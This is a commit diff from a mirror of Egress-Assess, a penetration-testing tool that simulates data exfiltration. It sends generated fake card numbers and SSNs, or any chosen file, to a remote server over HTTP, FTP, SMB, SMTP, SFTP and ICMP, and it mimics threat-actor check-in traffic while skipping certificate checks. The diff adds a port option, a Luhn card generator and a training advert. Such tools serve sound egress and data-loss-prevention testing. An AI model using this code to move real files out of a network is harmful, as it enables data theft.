infosecn1nja
/
Egress-Assess
mirror of https://github.com/infosecn1nja/Egress-Assess.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge pull request #1 from FortyNorthSecurity/master 

Updating Repo
master
Harley Lebeau 2019-02-14 13:07:35 -08:00 committed by GitHub
parent 62ab4d30cd 078966a4e2
commit 226d72ec12
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
4 changed files with 2221 additions and 2065 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

6
Egress-Assess.py
View File

@ -78,6 +78,7 @@ if __name__ == "__main__":
if server.protocol == cli_parsed.server.lower():
server.serve()
helpers.class_info()
elif cli_parsed.client is not None:
# load up all supported client protocols and datatypes
@ -95,6 +96,7 @@ if __name__ == "__main__":
for proto_name, proto_module in the_conductor.client_protocols.iteritems():
if proto_module.protocol == cli_parsed.client.lower():
proto_module.transmit(generated_data)
helpers.class_info()
sys.exit()
else:
@ -104,8 +106,10 @@ if __name__ == "__main__":
for proto_name, proto_module in the_conductor.client_protocols.iteritems():
if proto_module.protocol == cli_parsed.client.lower():
proto_module.transmit(file_data)
helpers.class_info()
sys.exit()
helpers.class_info()
print "[*] Error: You either didn't provide a valid datatype or client protocol to use."
print "[*] Error: Re-run and use --list-datatypes or --list-clients to see possible options."
sys.exit()
@ -128,7 +132,9 @@ if __name__ == "__main__":
generated_data = datatype_module.generate_data()
actor_variant.emulate(data_to_exfil=generated_data)
helpers.class_info()
# Instead, use the exfil data within the module
else:
actor_variant.emulate()
helpers.class_info()

286
EgressAssess.ps1
View File

@ -57,9 +57,12 @@ function Invoke-EgressAssess
This switch reduces the time required to generate fake data.
Note: Fake CC and SSN data will be generated in batches of 500 sequential values.
.Parameter Port
The port is if you wish to specify a non-standard port for data transfer(s)
.Example
Import-Module Egress-Assess.ps1
Invoke-EgressAssess -client http -ip 127.0.0.1 -Datatype cc -Size 50 -Loop 20 -Fast -Verbose
Invoke-EgressAssess -client http -ip 127.0.0.1 -Datatype cc -Size 50 -Port 8080 -Loop 20 -Fast -Verbose
Invoke-EgressAssess -client ftp -ip 127.0.0.1 -Username user -Password pass -Datatype ssn -Size 10 -Verbose
Invoke-EgressAssess -client smb -ip 127.0.0.1 -Datatype "c:\Users\testuser\secrets.xlsx" -Verbose
Invoke-EgressAssess -client icmp -ip 127.0.0.1 -Datatype ssn -Report -Verbose
@ -88,6 +91,8 @@ function Invoke-EgressAssess
[Parameter(Mandatory = $False)]
[string]$Password,
[Parameter(Mandatory = $False)]
[int]$Port,
[Parameter(Mandatory = $False)]
[int]$Size = 1,
[Parameter(Mandatory = $False)]
[int]$Loops = 1,
@ -144,6 +149,8 @@ function Invoke-EgressAssess
}#>
}
else
{
if(!$Port)
{
if ($client -eq "http")
{
@ -174,6 +181,7 @@ function Invoke-EgressAssess
Write-Verbose "[*] Protocol not available."
throw "Error"
}
}
#attempt to test connection to TCP ports
try
@ -301,95 +309,53 @@ function Invoke-EgressAssess
Write-Verbose "[*] Generating Credit Cards............."
$num = [math]::Round($Size * 1MB)/19
$num = [math]::Round($Size * 10000 * 3)
$intCardType = 0
for ($i = 0; $i -lt $num; $i++)
for ($countercc = 0; $countercc -lt $num; $countercc++)
{
# Taken from http://scriptolog.blogspot.com/2008/01/powershell-luhn-validation.html
$length = 16
$random = new-object random
$digits = new-object int[] $length
if ($Fast)
for($loopone = 0; $loopone -lt $length - 1; $loopone++){
$digits[$loopone] = $random.next(10)
}
[int]$sum = 0;
[bool]$alt = $true
for($looptwo = $length - 2; $looptwo -ge 0; $looptwo--){
if($alt){
[int]$temp = $digits[$looptwo]
$temp *= 2
if($temp -gt 9){ $temp -= 9 }
$sum += $temp
} else {
$sum += $digits[$looptwo]
}
$alt = !$alt
}
[int]$modulo = $sum % 10
if($modulo -gt 0) { $digits[$length-1] = (10 - $modulo) }
$digits = -join $digits
$randNumString = [string][int64]$digits
if ($randNumString.length -eq 15)
{
switch ($(Get-Random -maximum 4))
{
0 { # Generate Visa
$randNum = Get-Random -minimum 100000000000000 -maximum 1000000000000000
$randNumString = [string][int64]$randNum
$randCCbase = "4$($randNumString.substring(0,3))-$($randNumString.substring(3,4))-$($randNumString.substring(7,4))-"
}
1 { # Generate MasterCard
$randNum = Get-Random -minimum 100000000000000 -maximum 1000000000000000
$randNumString = [string][int64]$randNum
$randCCbase = "5$($randNumString.substring(0,3))-$($randNumString.substring(3,4))-$($randNumString.substring(7,4))-"
}
2 { # Generate Discover
$randNum = Get-Random -minimum 10000000 -maximum 100000000
$randNumString = [string][int64]$randNum
$randCCbase = "6011-$($randNumString.substring(0,4))-$($randNumString.substring(4,4))-"
}
3 { # Generate Amex
$randNum = Get-Random -minimum 100000000000000 -maximum 1000000000000000
$randNumString = [string][int64]$randNum
$randCCbase = "3$($randNumString.substring(0,3))-$($randNumString.substring(3,4))-$($randNumString.substring(7,4))-"
}
}
$endCC = $(Get-Random -minimum 1000 -maximum 9500)
for ($i2 = $endCC; $i2 -lt $($endCC+500); $i2++)
{
$randCC = "$randCCbase$i2"
$list.Add($randCC)
$i++
}
}
else
{
$baseCC = $null
if ($intCardType -gt 3)
{
$intCardType = 0
}
switch ($intCardType)
{
0 { # Generate Visa
$randNum = Get-Random -minimum 100000000000000 -maximum 1000000000000000
$randNumString = [string][int64]$randNum
$randCC = "4$($randNumString.substring(0,3))-$($randNumString.substring(3,4))-$($randNumString.substring(7,4))-$($randNumString.substring(11,4))"
$randCC = "$($randNumString.substring(0,4))-$($randNumString.substring(4,6))-$($randNumString.substring(10,5))"
$script:list.Add($randCC)
}
1 { # Generate MasterCard
$randNum = Get-Random -minimum 100000000000000 -maximum 1000000000000000
$randNumString = [string][int64]$randNum
$randCC = "5$($randNumString.substring(0,3))-$($randNumString.substring(3,4))-$($randNumString.substring(7,4))-$($randNumString.substring(11,4))"
elseif ($randNumString.length -eq 16)
{
$randCC = "$($randNumString.substring(0,4))-$($randNumString.substring(4,4))-$($randNumString.substring(8,4))-$($randNumString.substring(12,4))"
$script:list.Add($randCC)
}
2 { # Generate Discover
$randNum = Get-Random -minimum 100000000000 -maximum 1000000000000
$randNumString = [string][int64]$randNum
$randCC = "6011-$($randNumString.substring(0,4))-$($randNumString.substring(4,4))-$($randNumString.substring(8,4))"
$script:list.Add($randCC)
}
3 { # Generate Amex
$randNum = Get-Random -minimum 100000000000000 -maximum 1000000000000000
$randNumString = [string][int64]$randNum
$randCC = "3$($randNumString.substring(0,3))-$($randNumString.substring(3,4))-$($randNumString.substring(7,4))-$($randNumString.substring(11,4))"
$script:list.Add($randCC)
}
}
$intCardType++
}
}
$script:AllCC = $Script:list.ToArray()
$script:AllCC | Out-File C:\Users\ctrun\Desktop\test.txt
}
function Generate-Identity
@ -545,13 +511,28 @@ function Invoke-EgressAssess
# Checkin Request 1
if ($client -eq "http")
{
if (!$Port)
{
$Url = "http://" + $IP + "/major/images/view.php"
}
else
{
$Url = "http://" + $IP + ":" + $Port + "/major/images/view.php"
}
}
elseif ($client -eq "https")
{
if (!$Port)
{
$Url = "https://" + $IP + "/major/images/view.php"
}
else
{
$Url = "https://" + $IP + ":" + $Port + "/major/images/view.php"
}
}
$ranHost = Get-Random -InputObject $checkinDomains
[Net.ServicePointManager]::ServerCertificateValidationCallback = { $true }
$uri = New-Object -TypeName System.Uri -ArgumentList $Url
@ -574,13 +555,29 @@ function Invoke-EgressAssess
# Checkin Request 2
if ($client -eq "http")
{
if(!$Port)
{
$Url = "http://" + $IP + "/major/txt/read.php"
}
else
{
$Url = "http://" + $IP + ":" + $Port + "/major/txt/read.php"
}
}
elseif ($client -eq "https")
{
if(!$Port)
{
$Url = "https://" + $IP + "/major/txt/read.php"
}
else
{
$Url = "https://" + $IP + ":" + $Port + "/major/txt/read.php"
}
}
$ranHost = Get-Random -InputObject $checkinDomains
[Net.ServicePointManager]::ServerCertificateValidationCallback = { $true }
$uri = New-Object -TypeName System.Uri -ArgumentList $Url
@ -606,13 +603,29 @@ function Invoke-EgressAssess
{
$ranURI = Get-Random -InputObject $uris
if ($client -eq "http")
{
if(!$Port)
{
$Url = "http://" + $IP + $ranURI
}
else
{
$Url = "http://" + $IP + ":" + $Port + $ranURI
}
}
elseif ($client -eq "https")
{
if(!$Port)
{
$Url = "https://" + $IP + $ranURI
}
else
{
$Url = "https://" + $IP + ":" + $Port + $ranURI
}
}
$ranHost = Get-Random -InputObject $checkinDomains
[Net.ServicePointManager]::ServerCertificateValidationCallback = { $true }
$uri = New-Object -TypeName System.Uri -ArgumentList $Url
@ -692,13 +705,29 @@ function Invoke-EgressAssess
{
# Checkin Request
if ($client -eq "http")
{
if (!$Port)
{
$Url = "http://" + $IP + "/home/index.asp?typeid=13"
}
else
{
$Url = "http://" + $IP + ":" + $Port + "/home/index.asp?typeid=13"
}
}
elseif ($client -eq "https")
{
if(!$Port)
{
$Url = "https://" + $IP + "/home/index.asp?typeid=13"
}
else
{
$Url = "https://" + $IP + ":" + $Port + "/home/index.asp?typeid=13"
}
}
$ranHost = Get-Random -InputObject $domains
[Net.ServicePointManager]::ServerCertificateValidationCallback = { $true }
$uri = New-Object -TypeName System.Uri -ArgumentList $Url
@ -722,13 +751,29 @@ function Invoke-EgressAssess
$ranURI = Get-Random -InputObject $uris
if ($client -eq "http")
{
if(!$Port)
{
$Url = "http://" + $IP + $ranURI
}
else {
{
$Url = "http://" + $IP + ":" + $Port + $ranURI
}
}
}
elseif ($client -eq "https")
{
if(!$Port)
{
$Url = "https://" + $IP + $ranURI
}
else
{
$Url = "https://" + $IP + ":" + $Port + $ranURI
}
}
$ranHost = Get-Random -InputObject $domains
[Net.ServicePointManager]::ServerCertificateValidationCallback = { $true }
$uri = New-Object -TypeName System.Uri -ArgumentList $Url
@ -988,13 +1033,29 @@ function Invoke-EgressAssess
{
$ranURI = Get-Random -InputObject $uris
if ($client -eq "http")
{
if(!$Port)
{
$Url = "http://" + $IP + $ranURI
}
else
{
$Url = "http://" + $IP + ":" + $Port + $ranURI
}
}
elseif ($client -eq "https")
{
if(!$Port)
{
$Url = "https://" + $IP + $ranURI
}
else
{
$Url = "https://" + $IP + ":" + $Port + $ranURI
}
}
$ranHost = Get-Random -InputObject $domains
[Net.ServicePointManager]::ServerCertificateValidationCallback = { $true }
$uri = New-Object -TypeName System.Uri -ArgumentList $Url
@ -1099,13 +1160,29 @@ function Invoke-EgressAssess
{
$ranURI = Get-Random -InputObject $uris
if ($client -eq "http")
{
if(!$Port)
{
$Url = "http://" + $IP + $ranURI
}
else
{
$Url = "http://" + $IP + ":" + $Port + $ranURI
}
}
elseif ($client -eq "https")
{
if(!$Port)
{
$Url = "https://" + $IP + $ranURI
}
else
{
$Url = "https://" + $IP + ":" + $Port + $ranURI
}
}
$ranHost = Get-Random -InputObject $domains
[Net.ServicePointManager]::ServerCertificateValidationCallback = { $true }
$uri = New-Object -TypeName System.Uri -ArgumentList $Url
@ -1232,13 +1309,29 @@ function Invoke-EgressAssess
$Data = $AllNames
}
if ($client -eq "http")
{
if (!$Port)
{
$Url = "http://" + $IP + "/post_data.php"
}
else
{
$Url = "http://" + $IP + ":" + $Port + "/post_data.php"
}
}
elseif ($client -eq "https")
{
if (!$Port)
{
$Url = "https://" + $IP + "/post_data.php"
}
else
{
"https://" + $IP + ":" + $Port + "/post_data.php"
}
}
}
@ -1352,8 +1445,16 @@ function Invoke-EgressAssess
}
}
if ($filetransfer -eq $True)
{
if (!$Port)
{
$Destination = "ftp://" + $IP + "/" + $Path
}
else
{
$Destination = "ftp://" + $IP + ":" + $Port + "/" + $Path
}
$SourceFilePath = Get-ChildItem $Datatype | % { $_.FullName }
$webclient = New-Object System.Net.WebClient
$webclient.Credentials = New-Object System.Net.NetworkCredential($username, $password)
@ -1376,7 +1477,16 @@ function Invoke-EgressAssess
{
$Date = Get-Date -Format Mdyyyy_hhmmss
$Path = "ftpdata" + $Date + ".txt"
if (!$Port)
{
$Destination = "ftp://" + $Username + ":" + $Password + "@" + $IP + "/" + $Path
}
else
{
$Destination = "ftp://" + $Username + ":" + $Password + "@" + $IP + ":" + $Port + "/" + $Path
}
$ftpClient = New-Object System.Net.WebClient
$uri = New-Object System.Uri($Destination)
@ -1483,9 +1593,14 @@ function Invoke-EgressAssess
}
}
# Connect to Egress-Assess Server
if(!$Port)
{
$Port = 22
}
try
{
$Con = New-Object Renci.SshNet.PasswordConnectionInfo($IP, $Username, $Password)
$Con = New-Object Renci.SshNet.PasswordConnectionInfo($IP, $Port, $Username, $Password)
$sftpClient = New-Object Renci.SshNet.SftpClient($Con)
$sftpClient.Connect()
}
@ -1582,13 +1697,18 @@ function Invoke-EgressAssess
{
Try
{
if (!$Port)
{
$Port = 25
}
if ($filetransfer -eq $true)
{
Send-MailMessage -From tester@egress-assess.com -To server@egress-asses.com -Subject "Egress-Assess Exfil Data" -Body "EgressAssess With Attachment" -Attachments "$SourceFilePath" -SmtpServer $IP
Send-MailMessage -From tester@egress-assess.com -To server@egress-asses.com -Subject "Egress-Assess Exfil Data" -Body "EgressAssess With Attachment" -Attachments "$SourceFilePath" -SmtpServer $IP -Port $Port
}
else
{
Send-MailMessage -From tester@egress-assess.com -To server@egress-asses.com -Subject "Egress-Assess Exfil Data" -Body "$SMTPData" -SmtpServer $IP
Send-MailMessage -From tester@egress-assess.com -To server@egress-asses.com -Subject "Egress-Assess Exfil Data" -Body "$SMTPData" -SmtpServer $IP -Port $Port
}
}
catch

29
common/helpers.py
View File

@ -1,3 +1,4 @@
# -*- coding: utf-8 -*-
'''
This is for functions potentially used by all modules
@ -181,3 +182,31 @@ def writeout_text_data(incoming_data):
out_file.write(incoming_data)
return file_name
def class_info():
class_image = '''MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
M M
M .cCCc. M
M /cccccccc\\ Our Upcoming Trainings: M
M §cccccccc| M
M :ccccccccP NOLACON >> May 13-16 2019 M
M \\cccccccc() New Orleans M
M \\ccccccccD www.nolacon.com M
M |cccccccc\\ _ M
M |ccccccccc) // BLACKHAT >> August 3-6 M
M |cccccc|= // Las Vegas M
M /°°°°°°-. (CCCC) www.blackhat.com/us-19 M
M ;----._ _._ |cccc| M
M .*° °° °. \\cccc/ M
M / / ( )/ccc/ M
M |_/ | _.°cccc| M
M |/ °^^^°ccccccc/ M
M / \\cccccccc/ M
M / \\cccccc/ M
M | °*° M
M / \\ Psss. Follow us on >> Twitter M
M °*-.__________..-*°° >> Facebook M
M \\WWWWWWWWWWWWWWWW/ >> LinkedIn M
M \\WWWWWWWWWWWWWW/ M
MMMMM|WWWWWWWWWWWW|MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM'''
print(class_image)

9
protocols/clients/smb_client.py
View File

@ -27,9 +27,10 @@ class Client:
self.file_transfer = False
else:
if "/" in cli_object.file:
self.file_transfer = cli_object.file.split("/")[-1]
else:
self.file_transfer = cli_object.file
self.file_name = cli_object.file.split("/")[-1]
else:
self.file_name = cli_object.file
# transmit is the only required function within the object. It is what
# called by the framework to transmit data. However, you can create as
@ -49,7 +50,7 @@ class Client:
os.makedirs(mount_path)
# Base command to copy file over smb
smb_command = "smbclient \\\\\\\\" + self.remote_server + "\\\\\\DATA -N -c \"put "
smb_command = "smbclient \\\\\\\\" + self.remote_server + "\\\\DATA -N -c \"put "
# If using a file, copy it, else write to disk and then copy
if not self.file_transfer:
@ -59,7 +60,7 @@ class Client:
smb_command += smb_file_name + "\""
else:
smb_command += self.file_transfer + "\""
smb_command += self.file_transfer + " " + self.file_name + "\""
smb_file_name = self.file_transfer
print smb_command